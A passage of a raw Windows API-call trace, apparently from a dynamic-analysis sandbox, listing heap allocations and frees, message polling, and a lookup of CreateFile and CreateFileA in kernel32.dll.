dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0176.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0176.617] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0176.617] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.617] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0176.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0176.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0176.617] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0176.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0176.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0176.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0176.618] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0176.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0176.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0176.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0176.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0176.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0176.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0176.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0176.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0176.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0176.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0176.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0176.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0176.621] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0176.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0176.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0176.624] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0176.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd720 [0176.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd720, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0176.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.625] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0176.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0176.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0176.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0176.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd720, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0176.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.626] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 